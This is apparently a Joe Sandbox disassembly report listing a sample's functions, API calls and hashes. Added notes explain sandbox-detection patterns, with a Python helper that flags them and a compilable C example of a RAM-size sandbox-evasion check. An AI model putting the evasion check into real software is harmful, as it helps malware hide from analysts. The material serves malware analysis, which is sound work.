                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2875609808-0
                                                                                                                              • Opcode ID: 6a7f2f44e3dfa1e0f2c5565c505da9c7ba60c234eb7f75a261b437aa01891247
                                                                                                                              • Instruction ID: fe460b1ae879b523dda01258ccabb47bd9ae0c5016dc5e2bfe9e481e68c664ed
                                                                                                                              • Opcode Fuzzy Hash: 6a7f2f44e3dfa1e0f2c5565c505da9c7ba60c234eb7f75a261b437aa01891247
                                                                                                                              • Instruction Fuzzy Hash: 41112A31D44518DBCF04AFA5E949AFEBB75FF09751F018055E942B3241CB3095A0CB99
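The function at 001B49EE is listed with the call order QueryPerformanceCounter, Sleep, QueryPerformanceCounter, Sleep. A clock read on both sides of a Sleep is the shape of a common check for sandboxes that shorten or skip sleeps, and a chain of that shape is one of the things behind the "Found API chain indicative of sandbox detection" signature in the summary; the listing itself shows only the call order, not the comparison that follows it, so that remains an inference. The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses "APIs" sections in the line format this listing uses, keeps each function's direct calls in order, and flags orders that contain a clock-around-Sleep pattern. The sample input is constructed from entries shown on this page, and the set of patterns to flag is this example's own assumption.

```python
"""Triage helper for Joe Sandbox 'IDA Plugin' function listings.

Added example (not part of the report or the analysed sample): extract each
function's ordered API calls from the report text and flag call orders that
match known timing-evasion shapes.  Which shapes to flag is an assumption
of this example, not something the report states.
"""
import re

# Constructed sample input: three 'APIs' sections in the report's own line
# format (the addresses are the ones shown in the listing above).
SAMPLE_REPORT = """\
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0018C657
• GetStockObject.GDI32(00000011), ref: 0018C66B
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0018C675
Memory Dump Source
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 001B49EE
• Sleep.KERNEL32(00000000), ref: 001B4A13
• QueryPerformanceCounter.KERNEL32(?), ref: 001B4A1D
• Sleep.KERNEL32(?), ref: 001B4A50
Memory Dump Source
APIs
  • Part of subcall function 0019869D: __getptd_noexit.LIBCMT ref: 0019869E
• __lock.LIBCMT ref: 0019811F
• InterlockedDecrement.KERNEL32(?), ref: 0019813C
Memory Dump Source
"""

# One API line: optional "Part of subcall function XXXX:" prefix, then
# Name.MODULE, optional "(args)", then "ref: ADDRESS".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Ordered call shapes worth a second look (assumption of this example):
# reading a clock on both sides of Sleep is the usual way a sample notices
# a sandbox that shortens or skips sleeps.
PATTERNS = {
    "clock read around Sleep (QPC)":
        ["QueryPerformanceCounter", "Sleep", "QueryPerformanceCounter"],
    "clock read around Sleep (tick count)":
        ["GetTickCount", "Sleep", "GetTickCount"],
}


def parse_api_chains(text):
    """Split report text into per-function call lists.

    Returns one list per 'APIs' header, each a list of dicts with keys
    api, module, args, ref, subcall.  A header with no entries yields an
    empty list, as the report shows for some CRT helpers.
    """
    chains, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            chains.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            current.append({
                "api": m["api"], "module": m["module"],
                "args": m["args"], "ref": m["ref"],
                "subcall": m["sub"] is not None,
            })
        elif stripped:
            current = None  # any other heading ends this function's list
    return chains


def has_ordered_subsequence(names, pattern):
    """True if every element of pattern occurs in names, in that order."""
    it = iter(names)
    return all(p in it for p in pattern)


def flag_chains(chains):
    """Return (function_index, first_ref, pattern_label) for matching chains.

    Only direct calls are considered; entries reported as 'Part of subcall
    function' belong to a callee and would blur the order.
    """
    hits = []
    for idx, chain in enumerate(chains):
        direct = [c["api"] for c in chain if not c["subcall"]]
        for label, pattern in PATTERNS.items():
            if has_ordered_subsequence(direct, pattern):
                hits.append((idx, chain[0]["ref"], label))
    return hits


if __name__ == "__main__":
    for idx, ref, label in flag_chains(parse_api_chains(SAMPLE_REPORT)):
        print(f"function #{idx} (first ref {ref}): {label}")
```

Run against the constructed input it reports only the second function (first ref 001B49EE). A hit means the call order is worth opening in the disassembly, not that the function is proven to be an evasion check: the same sequence also occurs in benign timing loops, and the real test is what the code does with the difference between the two counter reads.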
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3016257755-0
                                                                                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                              • Instruction ID: 98249eaa636489f9ca9f8bf23487d60e480fd5f4e3abd4aaf28513148c9a2c1b
                                                                                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                              • Instruction Fuzzy Hash: CF014E7A00464EBBCF165E84DC41CEE3F67BB1A360B598415FA1859035D336CAB1AB81
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0019869D: __getptd_noexit.LIBCMT ref: 0019869E
                                                                                                                              • __lock.LIBCMT ref: 0019811F
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0019813C
                                                                                                                              • _free.LIBCMT ref: 0019814F
                                                                                                                              • InterlockedIncrement.KERNEL32(013F5FB0), ref: 00198167
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2704283638-0
                                                                                                                              • Opcode ID: 48dbf9cf9d439a0ab9d7c409a01c1afbf79cbe951bacc3691538dbdb10df283b
                                                                                                                              • Instruction ID: 07886e3ffd25ae236530f232cbfb46469337b82cfd3181909a40a7bf82073e3c
                                                                                                                              • Opcode Fuzzy Hash: 48dbf9cf9d439a0ab9d7c409a01c1afbf79cbe951bacc3691538dbdb10df283b
                                                                                                                              • Instruction Fuzzy Hash: 2A015231901622AFCF25AFA5A80A7AD7760BF06715F050169F81467A91CF346943CBD2
                                                                                                                              APIs
                                                                                                                              • __lock.LIBCMT ref: 00198768
                                                                                                                                • Part of subcall function 00198984: __mtinitlocknum.LIBCMT ref: 00198996
                                                                                                                                • Part of subcall function 00198984: RtlEnterCriticalSection.NTDLL(00190127), ref: 001989AF
                                                                                                                              • InterlockedIncrement.KERNEL32(DC840F00), ref: 00198775
                                                                                                                              • __lock.LIBCMT ref: 00198789
                                                                                                                              • ___addlocaleref.LIBCMT ref: 001987A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1687444384-0
                                                                                                                              • Opcode ID: bdb65039dd75d0f4e632a9d7f89551d4654b5cdee7efb27165b5c126f480fe21
                                                                                                                              • Instruction ID: 9952974421bac3488edab8d53abd3cfeaea8585525b9347608666f66b2c7ae29
                                                                                                                              • Opcode Fuzzy Hash: bdb65039dd75d0f4e632a9d7f89551d4654b5cdee7efb27165b5c126f480fe21
                                                                                                                              • Instruction Fuzzy Hash: 71016D71410B00EFDB20EFA5D809759F7E0BF60325F20890EE099976E0DB70A640CB02
                                                                                                                              APIs
                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 001B9C7F
                                                                                                                                • Part of subcall function 001BAD14: _memset.LIBCMT ref: 001BAD49
                                                                                                                              • _memmove.LIBCMT ref: 001B9CA2
                                                                                                                              • _memset.LIBCMT ref: 001B9CAF
                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 001B9CBF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 48991266-0
                                                                                                                              • Opcode ID: 2c2f9888afdd16fa62303a47ff4956785232cb63efd00832279333c2b21ca4b8
                                                                                                                              • Instruction ID: 8be53f23094c70666f684f34e45497167e8a3931d38046cb45fdbbc8d13ad855
                                                                                                                              • Opcode Fuzzy Hash: 2c2f9888afdd16fa62303a47ff4956785232cb63efd00832279333c2b21ca4b8
                                                                                                                              • Instruction Fuzzy Hash: D4F03A7A200000ABCF016F54EC85A9ABB2AEF55320B08C066FE089E227C775E951DBB5
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0018B5EB
                                                                                                                                • Part of subcall function 0018B58B: SelectObject.GDI32(?,00000000), ref: 0018B5FA
                                                                                                                                • Part of subcall function 0018B58B: BeginPath.GDI32(?), ref: 0018B611
                                                                                                                                • Part of subcall function 0018B58B: SelectObject.GDI32(?,00000000), ref: 0018B63B
                                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 001DE860
                                                                                                                              • LineTo.GDI32(00000000,?,?), ref: 001DE86D
                                                                                                                              • EndPath.GDI32(00000000), ref: 001DE87D
                                                                                                                              • StrokePath.GDI32(00000000), ref: 001DE88B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1539411459-0
                                                                                                                              • Opcode ID: ef3103dfa442bbda754ca67bbfd4375d0ecb4ae051c2ba95cc515d6e244b3cf4
                                                                                                                              • Instruction ID: 2301cc3ef06b05b09856c34093a39db23a77d350dc39584c61150aa38fe0120a
                                                                                                                              • Opcode Fuzzy Hash: ef3103dfa442bbda754ca67bbfd4375d0ecb4ae051c2ba95cc515d6e244b3cf4
                                                                                                                              • Instruction Fuzzy Hash: ADF0E231005259BBDB122F50BC0DFEE3F9AAF06311F008101FA01241E18B7946A2DFA9
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001AD640
• GetWindowThreadProcessId.USER32(?,00000000), ref: 001AD653
• GetCurrentThreadId.KERNEL32 ref: 001AD65A
• AttachThreadInput.USER32(00000000), ref: 001AD661
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 503628e04e596cf9191305c5919ceec4450d20ef93bbbed51d5db79d6c41502d
• Instruction ID: fcff1cf33845a0802db2de649c98ea89962b4ec35370c23eda2734dae415d2eb
• Opcode Fuzzy Hash: 503628e04e596cf9191305c5919ceec4450d20ef93bbbed51d5db79d6c41502d
• Instruction Fuzzy Hash: C5E03971101228BADB201BA2BC0DEFB7F1EEF567B1F408010B50DC5861CB719580CBA0
APIs
• GetSysColor.USER32(00000008), ref: 0018B0C5
• SetTextColor.GDI32(?,000000FF), ref: 0018B0CF
• SetBkMode.GDI32(?,00000001), ref: 0018B0E4
• GetStockObject.GDI32(00000005), ref: 0018B0EC
• GetWindowDC.USER32(?,00000000), ref: 001EECFA
• GetPixel.GDI32(00000000,00000000,00000000), ref: 001EED07
• GetPixel.GDI32(00000000,?,00000000), ref: 001EED20
• GetPixel.GDI32(00000000,00000000,?), ref: 001EED39
• GetPixel.GDI32(00000000,?,?), ref: 001EED59
• ReleaseDC.USER32(?,00000000), ref: 001EED64
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: 09b4b44ecec9d4b8593fa994d8356125317ebfe8b4d3defadd3374e6382c2e15
• Instruction ID: d5682fd6d7b38c1bb88a706712e2d1a031b0905512d0ad5eef6abf05a384186f
• Opcode Fuzzy Hash: 09b4b44ecec9d4b8593fa994d8356125317ebfe8b4d3defadd3374e6382c2e15
• Instruction Fuzzy Hash: E8E0ED31504680AEEF215F75BC4D7AC3B62AB56336F148266F66A580E2C7714580DB11
APIs
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: b0b763f9b958939423c68f3787744f6a8de392326294307a5ff1bb8d154b16d8
• Instruction ID: 8cb87510e11899d4a924bccc771bb21e1c1581127bad8b3b726d58b0dd9df3d9
• Opcode Fuzzy Hash: b0b763f9b958939423c68f3787744f6a8de392326294307a5ff1bb8d154b16d8
• Instruction Fuzzy Hash: EAE012B5500204EFDB006F70AC4CA7D3BEAEB48361F128805F84ACB650DBB49981CF40
APIs
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: ef6249d58d09966cbd4a14acf00e7d1e4d3553839c627a9ed38ffd30d6efb508
• Instruction ID: c498d49344d932b04017859ebffb6a368e718ab39ec648b8524ac972e07e3d3b
• Opcode Fuzzy Hash: ef6249d58d09966cbd4a14acf00e7d1e4d3553839c627a9ed38ffd30d6efb508
• Instruction Fuzzy Hash: 59E092B5540204AFDB016F70AC4C67D7BEAEB48361F118415F94ACB651DBB99A81CF50
APIs
Strings
Similarity
• API ID: _memmove
• String ID: >$DEFINE
• API String ID: 4104443479-1664449232
• Opcode ID: 3e55a8ea5806998577a29d468e00e95d11c4be55f5fa5a10e50ccaf712ba512f
• Instruction ID: 786c086abe0949e1cd59193854084b179ebcc551d097a405f8ca8d2c9d6fe51b
• Opcode Fuzzy Hash: 3e55a8ea5806998577a29d468e00e95d11c4be55f5fa5a10e50ccaf712ba512f
• Instruction Fuzzy Hash: A5126C75A0020ADFCF24CF98C490ABDB7B1FF48314F25815AE959AB395D774AD81CB90
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 001AECA0
Strings
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
• Opcode ID: beca8a8361e48a31285d74944d2e0a73b11e689dea62aa3839a4442a4c4f66b2
• Instruction ID: 5e18b8209bde16d26f9e91c51c9d893e2f86036b790b70bbbc386b9cbb7ea133
• Opcode Fuzzy Hash: beca8a8361e48a31285d74944d2e0a73b11e689dea62aa3839a4442a4c4f66b2
• Instruction Fuzzy Hash: 4F910874600701EFDB14DFA4C884B6ABBF5BF49710B14856DE94ADB291DBB1E841CB60
APIs
  • Part of subcall function 00173BCF: _wcscpy.LIBCMT ref: 00173BF2
  • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
  • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
• __wcsnicmp.LIBCMT ref: 001BE785
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 001BE84E
Strings
                                                                                                                              Similarity
                                                                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                              • String ID: LPT
                                                                                                                              • API String ID: 3222508074-1350329615
                                                                                                                              • Opcode ID: 504a4ae00cb4964c0a898435ec402024d74b2b77cbf84fe947241d6740bedecd
                                                                                                                              • Instruction ID: 63b1fd0c69967a57f2e93d6970cd56ca26eff998c92977ebdda2b34dcd940350
                                                                                                                              • Opcode Fuzzy Hash: 504a4ae00cb4964c0a898435ec402024d74b2b77cbf84fe947241d6740bedecd
                                                                                                                              • Instruction Fuzzy Hash: 45616F75A00615AFCB18EF94C895EEEB7F8EF18310F158069F546AB391DB70AE40CB91

APIs
• Sleep.KERNEL32(00000000), ref: 00171B83
• GlobalMemoryStatusEx.KERNEL32 ref: 00171B9C
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: f23f8404488bfbbf4ff121cba41646e097422b28d422b602a9804d48198bfef8
• Instruction ID: 2bd9c1543966d63d9f1655f7e4a32f51ab49d68275432c97e668c1ed8f97d7c1
• Opcode Fuzzy Hash: f23f8404488bfbbf4ff121cba41646e097422b28d422b602a9804d48198bfef8
• Instruction Fuzzy Hash: D8516A71408744ABE321AF54D889BAFBBECFFA9354F81484DF5C8410A1EB71856DCB62
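The record above is a function at 00171B83 that calls Sleep (with argument 0, which only yields the time slice) followed by GlobalMemoryStatusEx, the pairing the report's overview flags as an API chain indicative of sandbox detection. The dump shows the calls but not the decision made on the result; the following is an added illustration, not code recovered from AYRASY.exe, of the common form such a check takes: read ullTotalPhys and treat a small amount of installed RAM as a sign of an analysis VM. The 4 GiB threshold and the comparison direction are assumptions. The decision rule is kept in a separate function from the Windows call so it compiles and can be exercised on any platform.

```c
/* Added illustration of a RAM-size sandbox heuristic built on GlobalMemoryStatusEx.
 * Not recovered from the sample; threshold and rule are assumptions. */
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

#ifdef _WIN32
#include <windows.h>
#endif

/* Assumed threshold: analysis VMs are often provisioned with less than 4 GiB. */
#define SUSPICIOUS_RAM_BYTES (4ULL * 1024 * 1024 * 1024)

/* Pure decision logic, separated from the API call so it can be tested off-Windows. */
bool ram_looks_like_sandbox(uint64_t total_phys_bytes) {
    return total_phys_bytes < SUSPICIOUS_RAM_BYTES;
}

/* Wrapper around the API seen in the dump. Returns 0 if the query is unavailable or fails. */
uint64_t query_total_physical_ram(void) {
#ifdef _WIN32
    MEMORYSTATUSEX ms;
    ms.dwLength = sizeof(ms);            /* dwLength must be set before the call */
    if (!GlobalMemoryStatusEx(&ms)) {
        return 0;
    }
    return (uint64_t)ms.ullTotalPhys;
#else
    return 0;                            /* no Windows API on this platform */
#endif
}

int main(void) {
    uint64_t total = query_total_physical_ram();
    if (total == 0) {
        printf("could not query physical RAM\n");
        return 1;
    }
    printf("total physical RAM: %llu bytes -> %s\n",
           (unsigned long long)total,
           ram_looks_like_sandbox(total) ? "looks like a sandbox" : "looks like a real host");
    return 0;
}
```

For analysts, the practical consequence is that a detonation VM with less RAM than the threshold may get a benign code path; giving the VM a realistic amount of memory is the usual countermeasure. Whether this particular function in the sample applies that rule is not established by the dump alone.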

APIs
  • Part of subcall function 0017417D: __fread_nolock.LIBCMT ref: 0017419B
• _wcscmp.LIBCMT ref: 001BCF49
• _wcscmp.LIBCMT ref: 001BCF5C
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: a0c5f0199fa971ccb5a1f70b77f89dfbe6cd60a7f980ef7c8ff99fa15e2d5b24
• Instruction ID: 5878907074e08960f294562a0928c1bfef675ee80100abf02acecc8ad6ea83e9
• Opcode Fuzzy Hash: a0c5f0199fa971ccb5a1f70b77f89dfbe6cd60a7f980ef7c8ff99fa15e2d5b24
• Instruction Fuzzy Hash: 8D41D432A00219BBDF11EBA4CC81FEFBBBA9F59710F000469F615E7191D771AA44C790

APIs
• SendMessageW.USER32(00000027,00001132,00000000,?), ref: 001DA668
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001DA67D
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 5b0b1f22ec1b2fb7b621feb2567a890d0b57534b2ceaf1f6bcfd2cb344b936bf
• Instruction ID: 11b18b67f1c290ef989d7d1371e7bd81b197c8337a82009aa63e9b5a59976ef5
• Opcode Fuzzy Hash: 5b0b1f22ec1b2fb7b621feb2567a890d0b57534b2ceaf1f6bcfd2cb344b936bf
• Instruction Fuzzy Hash: F541E575A00209DFDB14CF68D881BDA7BB5BF09300F54456AE909AB381D770E952CFA1

APIs
• _memset.LIBCMT ref: 001C57E7
• InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 001C581D
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
• Opcode ID: 2f58c6b79741de82eb0ee165352b06ecc2b144c6e28fcc51513dedfef56bc7ba
• Instruction ID: ceda4750769c809ae10fd3ab68c578b48ceb926f3fb34c6908d07b0bd45687a6
• Opcode Fuzzy Hash: 2f58c6b79741de82eb0ee165352b06ecc2b144c6e28fcc51513dedfef56bc7ba
• Instruction Fuzzy Hash: C4311C71C00119EBCF11AFA1DC95EEE7FB9FF28350F108019F919A6162DB319A56DBA0

APIs
• DestroyWindow.USER32(?,?,?,?), ref: 001D961B
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001D9657
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
